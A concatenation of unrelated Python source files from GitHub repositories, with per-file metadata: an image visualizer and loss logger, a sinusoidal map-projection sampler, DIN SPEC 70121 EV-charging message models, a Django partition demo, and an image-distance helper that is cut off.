    print((product - 1) % MOD)


if __name__ == '__main__':
    main()
38033285671 | import numpy as np
import os
import sys
import ntpath
import time
from . import util
import imageio
from skimage import img_as_ubyte
if sys.version_info[0] == 2:
VisdomExceptionBase = Exception
else:
VisdomExceptionBase = ConnectionError
def save_images(webpage, visuals, image_path, aspect_ratio=1.0, width=256):
    """Save images to the disk.

    Parameters:
        webpage (the HTML class) -- the HTML webpage class that stores these imaegs (see html.py for more details)
        visuals (OrderedDict)    -- an ordered dictionary that stores (name, images (either tensor or numpy) ) pairs
        image_path (str)         -- the string is used to create image paths
        aspect_ratio (float)     -- the aspect ratio of saved images
        width (int)              -- the images will be resized to width x width

    This function will save images stored in 'visuals' to the HTML file specified by 'webpage'.
    Visuals whose label contains the letter 'B' are skipped entirely.
    """
    image_dir = webpage.get_image_dir()
    short_path = ntpath.basename(image_path[0])
    name = os.path.splitext(short_path)[0]
    webpage.add_header(name)
    ims, txts, links = [], [], []
    for label, im_data in visuals.items():
        # crude substring test: any label containing 'B' is dropped
        # NOTE(review): presumably filters the 'B'-domain outputs of a
        # two-domain model -- confirm against the labels actually produced
        if 'B' in label:
            continue
        im = util.tensor2im(im_data)
        image_name = '%s_%s.png' % (name, label)
        save_path = os.path.join(image_dir, image_name)
        util.save_image(im, save_path, aspect_ratio=aspect_ratio)
        ims.append(image_name)
        txts.append(label)
        links.append(image_name)
    webpage.add_images(ims, txts, links, width=width)
def save_image(images, size, img_path):
    """Tile `images` into a (rows, cols) grid via merge() and write it to
    img_path as an 8-bit image."""
    imageio.imsave(img_path, img_as_ubyte(merge(images, size)))
def merge(images, size):
    """Tile a batch of images into one mosaic.

    Parameters:
        images -- array of shape (N, h, w, 3)
        size   -- (rows, cols) layout of the grid; tiles are placed row-major

    Returns a float array of shape (rows*h, cols*w, 3).
    """
    rows, cols = size
    tile_h, tile_w = images.shape[1], images.shape[2]
    canvas = np.zeros((tile_h * rows, tile_w * cols, 3))
    for index in range(len(images)):
        row, col = divmod(index, cols)
        top, left = row * tile_h, col * tile_w
        canvas[top:top + tile_h, left:left + tile_w, :] = images[index]
    return canvas
class Visualizer():
    """This class includes several functions that can display/save images and print/save logging information.

    NOTE(review): the class docstring mentions visdom and HTML display, but
    this trimmed version only implements the loss-logging part (steps 2 and 3
    of __init__'s description are not performed here).
    """
    def __init__(self, opt):
        """Initialize the Visualizer class
        Parameters:
            opt -- stores all the experiment flags; needs to be a subclass of BaseOptions
        Step 1: Cache the training/test options
        Step 4: create a logging file to store training losses
        """
        self.opt = opt  # cache the option
        self.name = opt.name
        # create a logging file to store training losses
        self.log_name = os.path.join(opt.checkpoints_dir, opt.name, 'loss_log.txt')
        # append-mode: each run adds a timestamped section header
        with open(self.log_name, "a") as log_file:
            now = time.strftime("%c")
            log_file.write('================ Training Loss (%s) ================\n' % now)
    # losses: same format as |losses| of plot_current_losses
    def print_current_losses(self, epoch, iters, losses, t_comp, t_data):
        """print current losses on console; also save the losses to the disk
        Parameters:
            epoch (int) -- current epoch
            iters (int) -- current training iteration during this epoch (reset to 0 at the end of every epoch)
            losses (OrderedDict) -- training losses stored in the format of (name, float) pairs
            t_comp (float) -- computational time per data point (normalized by batch_size)
            t_data (float) -- data loading time per data point (normalized by batch_size)
        """
        message = '(epoch: %d, iters: %d, time: %.3f, data: %.3f) ' % (epoch, iters, t_comp, t_data)
        for k, v in losses.items():
            message += '%s: %.5f ' % (k, v)
        print(message)  # print the message
        with open(self.log_name, "a") as log_file:
            log_file.write('%s\n' % message)  # save the message
| IBMEOX/UltrasoundVQA | utils/visualizer.py | visualizer.py | py | 4,079 | python | en | code | 0 | github-code | 90 |
72117568616 | from numpy import *
from pyproj import *
def loadPoints(file_text):
    """Read whitespace-separated (u, v) coordinate pairs, one pair per line,
    and return them as an (n, 2) numpy array of floats."""
    points = []
    with open(file_text, 'r') as src:
        for row in src:
            first, second = row.split()
            points.append([float(first), float(second)])
    return array(points)
def samplePoints(umin, umax, vmin, vmax, Du, Dv):
    """Sample graticule intersection points.

    Iterates latitudes u in range(umin, umax, Du) (outer) and longitudes v
    in range(vmin, vmax, Dv) (inner) and returns the points as an (n, 2)
    array of [v, u] (lon, lat) pairs.

    Bug fix: the original opened "points.txt" for writing, never wrote to
    it and never used the handle -- its only effect was to truncate any
    existing points.txt; that vestigial open has been removed.
    """
    uv = []
    for u in range(umin, umax, Du):
        for v in range(vmin, vmax, Dv):
            uv.append([v, u])
    return array(uv)
def sampleMeridians(umin, umax, vmin, vmax, Dv, du):
    """Sample meridian polylines: for every longitude step Dv, one densely
    sampled run of latitudes (step du). Returns an (n, 2) array of
    [v, u] (lon, lat) pairs."""
    pts = []
    for lon in arange(vmin, vmax, Dv):
        pts.extend([lon, lat] for lat in arange(umin, umax, du))
    return array(pts)
def sampleParallels(umin, umax, vmin, vmax, Du, dv):
    """Sample parallel polylines: for every latitude step Du, one densely
    sampled run of longitudes (step dv). Returns an (n, 2) array of
    [v, u] (lon, lat) pairs."""
    pts = []
    for lat in arange(umin, umax, Du):
        for lon in arange(vmin, vmax, dv):
            pts.append([lon, lat])
    return array(pts)
def writePoints(file_text, u, v, x, y, a = [], b = []):
    """Write one tab-separated row per point: u, v, x, y and, when the
    distortion arrays are supplied, the Tissot indicatrix semi-axes a, b.

    Without a/b each row ends in a trailing tab (kept for compatibility
    with the original output format).
    """
    with open(file_text, "w") as out:
        for idx in range(len(u)):
            row = "\t".join(str(col) for col in (u[idx], v[idx], x[idx], y[idx])) + "\t"
            if len(a) > 0:
                row += str(a[idx]) + "\t" + str(b[idx])
            out.write(row + "\n")
#Define extent and steps
# latitude (u) in [-80, 80], longitude (v) in [-180, 180]
umin = -80
umax = 81
vmin = -180
vmax = 181
Du = 10
Dv = 10
# dense sub-steps for smooth meridian/parallel polylines
dv = Dv/10
du = Du/10
#Sample points, meridians and parallels
uv = samplePoints(umin, umax, vmin, vmax, Du, Dv)
uvm = sampleMeridians(umin, umax, vmin, vmax, Dv, du)
# NOTE(review): sampleParallels is declared as (..., Du, dv) but is called
# with (Dv, du); harmless only because Du == Dv and du == dv here -- confirm
uvp = sampleParallels(umin, umax, vmin, vmax, Dv, du)
#Load Europe
# NOTE(review): backslash in the path ('continents\eur.txt') only works on
# Windows; consider a forward slash or os.path.join
uve = loadPoints('continents\eur.txt')
#Define projection
sinu = Proj(proj='sinu', R=6380)
#Compute coordinates
# pyproj Proj objects take (lon, lat); the Europe file stores (lat, lon),
# hence the swapped column order below
[x,y] = sinu(uv[:, 0], uv[:, 1])
[xm,ym] = sinu(uvm[:, 0], uvm[:, 1])
[xp,yp] = sinu(uvp[:, 0], uvp[:, 1])
[xe,ye] = sinu(uve[:, 1], uve[:, 0])
#Compute distortions [a,b] for grid points
res = sinu.get_factors(uv[:, 0], uv[:, 1])
a,b = res.tissot_semimajor, res.tissot_semiminor
#Write points to files
writePoints("points_sinu.txt", uv[:, 1], uv[:, 0], x, y, a, b)
writePoints("meridians_sinu.txt", uvm[:, 1], uvm[:, 0], xm, ym, [], [])
writePoints("parallels_sinu.txt", uvp[:, 1], uvp[:, 0], xp, yp, [], [])
writePoints("europe_sinu.txt", uve[:, 1], uve[:, 0], xe, ye, [], [])
| bayertom/mmk_2021_22 | cv_12.py | cv_12.py | py | 2,518 | python | en | code | 0 | github-code | 90 |
33405926228 | import logging
from abc import ABC
from typing import Optional, Tuple, Type
from pydantic import Field, root_validator, validator
from iso15118.shared.exceptions import V2GMessageValidationError
from iso15118.shared.messages import BaseModel
from iso15118.shared.messages.datatypes import (
DCEVSEChargeParameter,
DCEVSEStatus,
PVEVMaxCurrentLimitDin,
PVEVMaxPowerLimitDin,
PVEVMaxVoltageLimitDin,
PVEVSEMaxCurrentLimitDin,
PVEVSEMaxPowerLimitDin,
PVEVSEMaxVoltageLimitDin,
PVEVSEPresentCurrentDin,
PVEVSEPresentVoltageDin,
PVEVTargetCurrentDin,
PVEVTargetVoltageDin,
PVRemainingTimeToBulkSOCDin,
PVRemainingTimeToFullSOCDin,
SelectedServiceList,
)
from iso15118.shared.messages.din_spec.datatypes import (
ACEVChargeParameter,
ACEVSEChargeParameter,
ACEVSEStatus,
AuthOptionList,
ChargeService,
ChargingProfile,
DCEVChargeParameter,
DCEVPowerDeliveryParameter,
DCEVStatus,
ResponseCode,
SAScheduleList,
ServiceCategory,
ServiceList,
)
from iso15118.shared.messages.enums import (
AuthEnum,
EnergyTransferModeEnum,
EVSEProcessing,
)
from iso15118.shared.validators import one_field_must_be_set
logger = logging.getLogger(__name__)
class BodyBase(BaseModel, ABC):
    """
    A base class for all body elements of a V2GMessage Body. This base type is
    substituted by the concrete messages from SessionSetupReq to SessionStopRes
    when creating a V2GMessage instance.
    See section 9.3.4 Message Body Definition in DIN SPEC 70121
    """
    def __str__(self):
        # human-readable message name: the concrete subclass's class name
        return type(self).__name__
class Response(BodyBase, ABC):
    """
    The base class for all response messages, as they all share a response code
    """
    # mandatory in every response; concrete enum values in ResponseCode
    response_code: ResponseCode = Field(..., alias="ResponseCode")
class SessionSetupReq(BodyBase):
    """See section 9.4.1.2.2 in DIN SPEC 70121"""

    """Refer Table 29 under section 9.4.1.2.2"""

    # XSD type hexBinary with max 8 bytes
    # (Spec is quite unclear here, but data from field show that 8bytes are used)
    evcc_id: str = Field(..., max_length=16, alias="EVCCID")

    @validator("evcc_id")
    def check_evcc_id_is_hexbinary(cls, value):
        """
        Checks whether the evcc_id field is a hexadecimal representation of
        at most 8 bytes (16 hex characters, matching max_length above).

        Bug fix: the docstring and error message previously claimed a
        6-byte limit, contradicting the field's 16-character constraint;
        the validator was also misleadingly named check_sessionid_*.

        Pydantic validators are "class methods",
        see https://pydantic-docs.helpmanual.io/usage/validators/
        """
        # pylint: disable=no-self-argument
        # pylint: disable=no-self-use
        try:
            # parsing with base 16 raises ValueError on non-hex characters
            int(value, 16)
            return value
        except ValueError as exc:
            raise ValueError(
                f"Invalid value '{value}' for EVCCID (must be "
                f"hexadecimal representation of max 8 bytes)"
            ) from exc
class SessionSetupRes(Response):
    """
    See section 9.4.1.2.3 in DIN SPEC 70121
    The SECC and the EVCC shall use the format for EVSEID as defined
    in DIN SPEC 91286.
    For EVSE ID format see section 5.3.2:
    "Each <EVSEID> has a variable length with at least five characters (one
    digit <Country Code>, three digits <Spot Operator ID>, one digit <Power Outlet ID>)
    and at most forty-one characters (three digits <Country Code>,
    six digits <Spot Operator ID>, thirty-two digits <Power Outlet ID>).
    While the <Spot Operator ID> must be assigned by a central issuing authority,
    each operator with an assigned <Spot Operator ID> can choose the <Power Outlet ID>
    within the above mentioned rules freely."
    This must be represented in hexbinary.
    Example: The DIN SPEC 91286 EVSE ID “49*89*6360” is represented
    as “0x49 0xA8 0x9A 0x63 0x60”.
    """
    # hexbinary EVSE ID per DIN SPEC 91286 (see docstring for length rules)
    evse_id: str = Field(..., min_length=7, max_length=32, alias="EVSEID")
    # optional wall-clock of the SECC (default None -> element omitted)
    datetime_now: int = Field(None, alias="DateTimeNow")
class ServiceDiscoveryReq(BodyBase):
    """
    See section 9.4.1.3.2 in DIN SPEC 70121
    In the scope of DIN SPEC 70121, the optional element ServiceScope shall NOT be used.
    In the scope of DIN SPEC 70121, if the optional element ServiceCategory is used,
    it shall always contain the value "EVCharging"
    """
    # both elements optional; see docstring for DIN SPEC 70121 restrictions
    service_scope: str = Field(None, max_length=32, alias="ServiceScope")
    service_category: ServiceCategory = Field(None, alias="ServiceCategory")
class ServiceDiscoveryRes(Response):
    """See section 9.4.1.3.3 in DIN SPEC 70121
    In the scope of DIN SPEC 70121, the element “ServiceList” shall not be used.
    In the scope of DIN SPEC 70121, only the PaymentOption “ExternalPayment”
    shall be used.
    """
    auth_option_list: AuthOptionList = Field(..., alias="PaymentOptions")
    charge_service: ChargeService = Field(..., alias="ChargeService")
    # optional and, per the docstring, not to be used under DIN SPEC 70121
    service_list: ServiceList = Field(None, alias="ServiceList")
class ServicePaymentSelectionReq(BodyBase):
    """
    See section 9.4.1.4.2 in DIN SPEC 70121
    [V2G-DC-252] Only the PaymentOption “ExternalPayment” shall be used,
    since detailed payment options are not defined.
    """
    selected_payment_option: AuthEnum = Field(..., alias="SelectedPaymentOption")
    selected_service_list: SelectedServiceList = Field(..., alias="SelectedServiceList")
class ServicePaymentSelectionRes(Response):
    """See section 9.4.1.4.3 in DIN SPEC 70121"""
    # carries only the inherited ResponseCode; no additional fields
class ContractAuthenticationReq(BodyBase):
    """See section 9.4.1.5.1 in DIN SPEC 70121"""
    # In the scope of DIN SPEC 70121, the element “GenChallenge” shall not be used.
    # In the scope of DIN SPEC 70121, the element “Id” shall not be used.
    # (both are declared optional so the schema still parses messages that
    # include them)
    gen_challenge: str = Field(None, alias="GenChallenge")
    id: str = Field(None, alias="Id")
class ContractAuthenticationRes(Response):
    """
    See section 9.4.1.5.2 in DIN SPEC 70121
    Parameter indicating that the EVSE has finished the processing
    that was initiated after the ContractAuthenticationReq or that
    the EVSE is still processing at the time the response message was sent.
    """
    # NOTE(review): declared optional (default None) although the docstring
    # reads as if the element were always present -- confirm against the spec
    evse_processing: EVSEProcessing = Field(None, alias="EVSEProcessing")
class ChargeParameterDiscoveryReq(BodyBase):
    """
    See section 9.4.1.6.2 in DIN SPEC 70121
    In the scope of DIN SPEC 70121, the EVCC shall not transmit other values
    than “DC_extended” and “DC_core” in EVRequestedEnergyTransferType.
    """
    requested_energy_mode: EnergyTransferModeEnum = Field(
        ..., alias="EVRequestedEnergyTransferType"
    )
    """
    In the scope of DIN SPEC 70121, the element “AC_EVChargeParameter”
    shall not be used.
    """
    ac_ev_charge_parameter: ACEVChargeParameter = Field(
        None, alias="AC_EVChargeParameter"
    )
    """
    In the scope of DIN SPEC 70121, the EVSE shall provide its
    maximum output power limit in the element “EVSEMaximumPowerLimit”
    of “DC_EVSEChargeParameter”.
    """
    dc_ev_charge_parameter: DCEVChargeParameter = Field(
        None, alias="DC_EVChargeParameter"
    )
    @root_validator(pre=True)
    def only_dc_charge_params(cls, values):
        """
        Only dc_ev_charge_parameter must be set,
        Pydantic validators are "class methods",
        see https://pydantic-docs.helpmanual.io/usage/validators/
        """
        # pylint: disable=no-self-argument
        # pylint: disable=no-self-use
        # checks both the pythonic field name and the XML alias, since this
        # runs pre-validation on raw input
        if one_field_must_be_set(
            [
                "dc_ev_charge_parameter",
                "DC_EVChargeParameter",
            ],
            values,
            True,
        ):
            return values
    @root_validator()
    def validate_requested_energy_mode(cls, values):
        """
        requested_energy_mode must be either DC_extended or DC_core
        Only dc_ev_charge_parameter must be set and must match requested_energy_mode
        Pydantic validators are "class methods",
        see https://pydantic-docs.helpmanual.io/usage/validators/
        """
        # pylint: disable=no-self-argument
        # pylint: disable=no-self-use
        requested_energy_mode, ac_params, dc_params = (
            values.get("requested_energy_mode"),
            values.get("ac_ev_charge_parameter"),
            values.get("dc_ev_charge_parameter"),
        )
        # NOTE(review): the string membership/substring tests below rely on
        # EnergyTransferModeEnum comparing equal to (and supporting `in` on)
        # its string value, i.e. being a str-based enum -- confirm
        if requested_energy_mode not in ("DC_extended", "DC_core"):
            raise V2GMessageValidationError(
                f"[V2G2-476] Wrong energy transfer mode transfer mode "
                f"{requested_energy_mode}",
                ResponseCode.FAILED_WRONG_ENERGY_TRANSFER_MODE,
                cls,
            )
        if ("AC_" in requested_energy_mode and dc_params) or (
            "DC_" in requested_energy_mode and ac_params
        ):
            raise V2GMessageValidationError(
                "[V2G2-477] Wrong charge parameters for requested energy "
                f"transfer mode {requested_energy_mode}",
                ResponseCode.FAILED_WRONG_CHARGE_PARAMETER,
                cls,
            )
        return values
class ChargeParameterDiscoveryRes(Response):
    """See section 9.4.1.6.3 in DIN SPEC 70121"""
    evse_processing: EVSEProcessing = Field(..., alias="EVSEProcessing")
    # schedule list is optional while the SECC is still processing
    sa_schedule_list: SAScheduleList = Field(None, alias="SAScheduleList")
    """
    In the scope of DIN SPEC 70121, the element “AC_EVSEChargeParameter”
    shall not be used.
    """
    ac_charge_parameter: ACEVSEChargeParameter = Field(
        None, alias="AC_EVSEChargeParameter"
    )
    dc_charge_parameter: DCEVSEChargeParameter = Field(
        None, alias="DC_EVSEChargeParameter"
    )
    # TODO Reactivate the validator once you figured out how to deal with the
    #  failed_responses dict
    # @root_validator(pre=True)
    # def either_ac_or_dc_charge_params(cls, values):
    #     """
    #     Either ac_charge_parameter or dc_charge_parameter must be set,
    #     depending on whether the chosen energy transfer mode is AC or DC.
    #
    #     Pydantic validators are "class methods",
    #     see https://pydantic-docs.helpmanual.io/usage/validators/
    #     """
    #     # pylint: disable=no-self-argument
    #     # pylint: disable=no-self-use
    #     if one_field_must_be_set(['ac_charge_parameter',
    #                               'AC_EVSEChargeParameter',
    #                               'dc_charge_parameter',
    #                               'DC_EVSEChargeParameter'],
    #                              values,
    #                              True):
    #         return values
    # TODO Reactivate the validator once you figured out how to deal with the
    #  failed_responses dict
    # @root_validator()
    # def schedule_must_be_set_if_processing_finished(cls, values):
    #     """
    #     Once the field evse_processing is set to EVSEProcessing.FINISHED, the
    #     fields sa_schedule_list and ac_charge_parameter must be set.
    #     """
    #     # pylint: disable=no-self-argument
    #     # pylint: disable=no-self-use
    #     evse_processing, schedules, ac_charge_params, dc_charge_params = \
    #         values.get('evse_processing'), \
    #         values.get('sa_schedule_list'), \
    #         values.get('ac_charge_parameter'), \
    #         values.get('ac_charge_parameter')
    #     if evse_processing == EVSEProcessing.FINISHED and (
    #             not schedules or not (ac_charge_params or dc_charge_params)):
    #         raise ValueError("SECC set EVSEProcessing to 'FINISHED' but either"
    #                          "SAScheduleList or charge parameters are not set")
    #     return values
class PowerDeliveryReq(BodyBase):
    """See section 9.4.1.7.2 in DIN SPEC 70121"""
    ready_to_charge: bool = Field(..., alias="ReadyToChargeState")
    # optional elements; omitted when the EV sends no profile/DC parameters
    charging_profile: ChargingProfile = Field(None, alias="ChargingProfile")
    dc_ev_power_delivery_parameter: DCEVPowerDeliveryParameter = Field(
        None, alias="DC_EVPowerDeliveryParameter"
    )
class PowerDeliveryRes(Response):
    """See section 9.4.1.7.3 in DIN SPEC 70121"""

    # NOTE(review): the line below is a bare string statement (a no-op), not
    # a docstring for the field; it only documents that AC_EVSEStatus is
    # unused in DIN SPEC 70121.
    """ In the scope of DIN SPEC 70121, AC_EVSEStatus shall not be used. """
    ac_evse_status: ACEVSEStatus = Field(None, alias="AC_EVSEStatus")
    # DC status is mandatory because DIN SPEC 70121 covers DC charging only.
    dc_evse_status: DCEVSEStatus = Field(..., alias="DC_EVSEStatus")

    # TODO Reactivate the validator once you figured out how to deal with the
    #      failed_responses dict
    # @root_validator(pre=True)
    # def either_ac_or_dc_status(cls, values):
    #     """
    #     Either ac_evse_status or dc_evse_status must be set,
    #     depending on whether the chosen energy transfer mode is AC or DC.
    #
    #     Pydantic validators are "class methods",
    #     see https://pydantic-docs.helpmanual.io/usage/validators/
    #     """
    #     # pylint: disable=no-self-argument
    #     # pylint: disable=no-self-use
    #     if one_field_must_be_set(['ac_evse_status',
    #                               'AC_EVSEStatus',
    #                               'dc_evse_status',
    #                               'DC_EVSEStatus'],
    #                              values,
    #                              True):
    #         return values
class CableCheckReq(BodyBase):
    """See section 9.4.2.2.2 in DIN SPEC 70121"""

    # DC EV status reported while the SECC runs the cable/isolation check.
    dc_ev_status: DCEVStatus = Field(..., alias="DC_EVStatus")
class CableCheckRes(Response):
    """See section 9.4.2.2.3 in DIN SPEC 70121"""

    dc_evse_status: DCEVSEStatus = Field(..., alias="DC_EVSEStatus")
    # ONGOING while the isolation check runs; FINISHED once it is complete.
    evse_processing: EVSEProcessing = Field(..., alias="EVSEProcessing")
class PreChargeReq(BodyBase):
    """
    See section 9.4.2.3.2 in DIN SPEC 70121

    With the Pre Charging Request the EV asks the EVSE to apply certain values
    for output voltage and output current. Since the contactors of the EV are
    open during Pre Charging, the actual current flow from the EVSE to the EV
    will be very small, i. e. in most cases smaller than the requested output
    current. The EV may use several Pre Charging Request/Response message pairs
    in order to precisely adjust the EVSE output voltage to the EV RESS voltage
    measured inside the EV.
    """

    dc_ev_status: DCEVStatus = Field(..., alias="DC_EVStatus")
    # Output voltage the EV asks the EVSE to apply during pre-charge.
    ev_target_voltage: PVEVTargetVoltageDin = Field(..., alias="EVTargetVoltage")
    # Output current the EV asks for (actual flow is near zero, see above).
    ev_target_current: PVEVTargetCurrentDin = Field(..., alias="EVTargetCurrent")
class PreChargeRes(Response):
    """See section 9.4.2.3.3 in DIN SPEC 70121"""

    dc_evse_status: DCEVSEStatus = Field(..., alias="DC_EVSEStatus")
    # Voltage currently measured at the EVSE output, so the EV can decide
    # when it matches its RESS voltage closely enough to close contactors.
    evse_present_voltage: PVEVSEPresentVoltageDin = Field(
        ..., alias="EVSEPresentVoltage"
    )
class CurrentDemandReq(BodyBase):
    """See section 9.4.2.4.2 in DIN SPEC 70121"""

    dc_ev_status: DCEVStatus = Field(..., alias="DC_EVStatus")
    # Current the EV requests for this charge loop iteration.
    ev_target_current: PVEVTargetCurrentDin = Field(..., alias="EVTargetCurrent")
    # Optional EV-side limits the EVSE must not exceed.
    ev_max_voltage_limit: PVEVMaxVoltageLimitDin = Field(
        None, alias="EVMaximumVoltageLimit"
    )
    ev_max_current_limit: PVEVMaxCurrentLimitDin = Field(
        None, alias="EVMaximumCurrentLimit"
    )
    ev_max_power_limit: PVEVMaxPowerLimitDin = Field(None, alias="EVMaximumPowerLimit")
    # Completion flags: bulk SOC (optional) and full charge (mandatory).
    bulk_charging_complete: bool = Field(None, alias="BulkChargingComplete")
    charging_complete: bool = Field(..., alias="ChargingComplete")
    remaining_time_to_full_soc: PVRemainingTimeToFullSOCDin = Field(
        None, alias="RemainingTimeToFullSoC"
    )
    remaining_time_to_bulk_soc: PVRemainingTimeToBulkSOCDin = Field(
        None, alias="RemainingTimeToBulkSoC"
    )
    # Voltage the EV requests for this charge loop iteration.
    ev_target_voltage: PVEVTargetVoltageDin = Field(..., alias="EVTargetVoltage")
class CurrentDemandRes(Response):
    """See section 9.4.2.4.3 in DIN SPEC 70121"""

    dc_evse_status: DCEVSEStatus = Field(..., alias="DC_EVSEStatus")
    # Measured output values at the EVSE.
    evse_present_voltage: PVEVSEPresentVoltageDin = Field(
        ..., alias="EVSEPresentVoltage"
    )
    evse_present_current: PVEVSEPresentCurrentDin = Field(
        ..., alias="EVSEPresentCurrent"
    )
    # True when the EVSE is clamping the requested value at its own limit.
    evse_current_limit_achieved: bool = Field(..., alias="EVSECurrentLimitAchieved")
    evse_voltage_limit_achieved: bool = Field(..., alias="EVSEVoltageLimitAchieved")
    evse_power_limit_achieved: bool = Field(..., alias="EVSEPowerLimitAchieved")
    # Optional EVSE-side maximum limits advertised to the EV.
    evse_max_voltage_limit: PVEVSEMaxVoltageLimitDin = Field(
        None, alias="EVSEMaximumVoltageLimit"
    )
    evse_max_current_limit: PVEVSEMaxCurrentLimitDin = Field(
        None, alias="EVSEMaximumCurrentLimit"
    )
    evse_max_power_limit: PVEVSEMaxPowerLimitDin = Field(
        None, alias="EVSEMaximumPowerLimit"
    )
class WeldingDetectionReq(BodyBase):
    """See section 9.4.2.5.2 in DIN SPEC 70121"""

    # DC EV status sent while the EV checks its contactors for welding.
    dc_ev_status: DCEVStatus = Field(..., alias="DC_EVStatus")
class WeldingDetectionRes(Response):
    """See section 9.4.2.5.3 in DIN SPEC 70121"""

    dc_evse_status: DCEVSEStatus = Field(..., alias="DC_EVSEStatus")
    # Voltage measured at the EVSE output, used by the EV to detect whether
    # its contactors opened correctly.
    evse_present_voltage: PVEVSEPresentVoltageDin = Field(
        ..., alias="EVSEPresentVoltage"
    )
class SessionStopReq(BodyBase):
    """See section 9.4.1.8.2 in DIN SPEC 70121"""
    # The request body carries no fields in DIN SPEC 70121.
class SessionStopRes(Response):
    """See section 9.4.1.8.3 in DIN SPEC 70121"""
    # Only the inherited ResponseCode is transmitted; no extra fields.
class Body(BaseModel):
    """
    The body element of a V2GMessage.
    See section 9.3.4 Message Body Definition in DIN SPEC 70121

    Exactly one of the optional message fields below is expected to be set
    for any given V2GMessage; the get_message* helpers return that one.
    """

    session_setup_req: SessionSetupReq = Field(None, alias="SessionSetupReq")
    session_setup_res: SessionSetupRes = Field(None, alias="SessionSetupRes")
    service_discovery_req: ServiceDiscoveryReq = Field(None, alias="ServiceDiscoveryReq")
    service_discovery_res: ServiceDiscoveryRes = Field(None, alias="ServiceDiscoveryRes")
    service_payment_selection_req: ServicePaymentSelectionReq = Field(
        None, alias="ServicePaymentSelectionReq"
    )
    service_payment_selection_res: ServicePaymentSelectionRes = Field(
        None, alias="ServicePaymentSelectionRes"
    )
    contract_authentication_req: ContractAuthenticationReq = Field(
        None, alias="ContractAuthenticationReq"
    )
    contract_authentication_res: ContractAuthenticationRes = Field(
        None, alias="ContractAuthenticationRes"
    )
    charge_parameter_discovery_req: ChargeParameterDiscoveryReq = Field(
        None, alias="ChargeParameterDiscoveryReq"
    )
    charge_parameter_discovery_res: ChargeParameterDiscoveryRes = Field(
        None, alias="ChargeParameterDiscoveryRes"
    )
    power_delivery_req: PowerDeliveryReq = Field(None, alias="PowerDeliveryReq")
    power_delivery_res: PowerDeliveryRes = Field(None, alias="PowerDeliveryRes")
    cable_check_req: CableCheckReq = Field(None, alias="CableCheckReq")
    cable_check_res: CableCheckRes = Field(None, alias="CableCheckRes")
    pre_charge_req: PreChargeReq = Field(None, alias="PreChargeReq")
    pre_charge_res: PreChargeRes = Field(None, alias="PreChargeRes")
    current_demand_req: CurrentDemandReq = Field(None, alias="CurrentDemandReq")
    current_demand_res: CurrentDemandRes = Field(None, alias="CurrentDemandRes")
    welding_detection_req: WeldingDetectionReq = Field(None, alias="WeldingDetectionReq")
    welding_detection_res: WeldingDetectionRes = Field(None, alias="WeldingDetectionRes")
    session_stop_req: SessionStopReq = Field(None, alias="SessionStopReq")
    session_stop_res: SessionStopRes = Field(None, alias="SessionStopRes")

    def get_message(self) -> Optional[BodyBase]:
        """Return the one message field that is set, or None if none is."""
        for value in self.__dict__.values():
            if value:
                return value
        return None

    def get_message_name(self) -> str:
        """Return the name of the one set message field, or '' if none is."""
        message = self.get_message()
        return "" if message is None else str(message)

    def get_message_and_name(self) -> Tuple[Optional[BodyBase], str]:
        """Return (message, name) for the one set field, or (None, '')."""
        message = self.get_message()
        if message is None:
            return None, ""
        return message, str(message)
# Lookup table from DIN SPEC 70121 message name to message class. Built once
# at import time; the original rebuilt this 22-entry dict on every call.
_MSG_TYPES = {
    "SessionSetupReq": SessionSetupReq,
    "SessionSetupRes": SessionSetupRes,
    "ServiceDiscoveryReq": ServiceDiscoveryReq,
    "ServiceDiscoveryRes": ServiceDiscoveryRes,
    "ServicePaymentSelectionReq": ServicePaymentSelectionReq,
    "ServicePaymentSelectionRes": ServicePaymentSelectionRes,
    "ContractAuthenticationReq": ContractAuthenticationReq,
    "ContractAuthenticationRes": ContractAuthenticationRes,
    "ChargeParameterDiscoveryReq": ChargeParameterDiscoveryReq,
    "ChargeParameterDiscoveryRes": ChargeParameterDiscoveryRes,
    "CableCheckReq": CableCheckReq,
    "CableCheckRes": CableCheckRes,
    "PreChargeReq": PreChargeReq,
    "PreChargeRes": PreChargeRes,
    "PowerDeliveryReq": PowerDeliveryReq,
    "PowerDeliveryRes": PowerDeliveryRes,
    "CurrentDemandReq": CurrentDemandReq,
    "CurrentDemandRes": CurrentDemandRes,
    "WeldingDetectionReq": WeldingDetectionReq,
    "WeldingDetectionRes": WeldingDetectionRes,
    "SessionStopReq": SessionStopReq,
    "SessionStopRes": SessionStopRes,
}


def get_msg_type(msg_name: str) -> Optional[Type[BodyBase]]:
    """
    Returns the message type corresponding to the message name provided, or
    None if no match is found.

    Args:
        msg_name: The name of the message (e.g. SessionSetupReq)

    Returns: The message type corresponding to the given message name
    """
    return _MSG_TYPES.get(msg_name)
| sahabulh/switchev_iso15118 | iso15118/shared/messages/din_spec/body.py | body.py | py | 21,706 | python | en | code | 1 | github-code | 90 |
9991566360 | # -*- coding: UTF-8 -*-
from example import models
def demo_simple():
    """Create and persist a single Shop record with fixed demo values."""
    shop = models.Shop(name='My Shop', address='My Address')
    shop.save()
def demo_partition():
    """Persist a ShopCustomer under a random shop id (1-10) and report it.

    Exercises the partitioned ShopCustomer model: the chosen shop_id decides
    which partition the row lands in.
    """
    from random import randint

    chosen_shop = randint(1, 10)
    customer = models.ShopCustomer(
        shop_id=chosen_shop, name='Customer 1', mobile_number='123456'
    )
    customer.save()
    print('shop_id=%s' % chosen_shop)
| karla9/django_partition | demo_app/example/views.py | views.py | py | 454 | python | en | code | 1 | github-code | 90 |
12542974713 | import numpy as np
from scipy.spatial import distance
def get_closest_images(images, image_index_to_measure, num_results=5):
    """
    Calculate the manhattan distance between the image of
    image_index_to_measure and all other images. Return the indicies
    of the closest images and their distances.

    The reference image itself (distance 0 to itself) is excluded by
    dropping the first entry of the ranking.

    :param list(list(int)) images: images to measure distance to
    :param int image_index_to_measure: index of image with which to
        measure distances
    :param int num_results: number of distances and indicies to return
    :return list(float) distances_closest: distances of closest images
    :return list(int) indicies_closest: indicies of closest images
    """
    reference = images[image_index_to_measure]
    distances = [distance.cityblock(reference, image) for image in images]
    # Sort once and derive both outputs from the same ranking; the original
    # redundantly sorted the distance list a second time for the values.
    ranked = sorted(range(len(distances)), key=lambda k: distances[k])
    indicies_closest = ranked[1:1 + num_results]
    distances_closest = [distances[i] for i in indicies_closest]
    return distances_closest, indicies_closest
def get_concatenated_images(images, image_indicies_to_concatenate):
    """
    Create a row of concatenated images.

    :param list(list(float)) images: a list of images
    :param list(int) image_indicies_to_concatenate: indicies of images
        to concatenate
    :return list(list(float)): the desired images concatenated side by side
    """
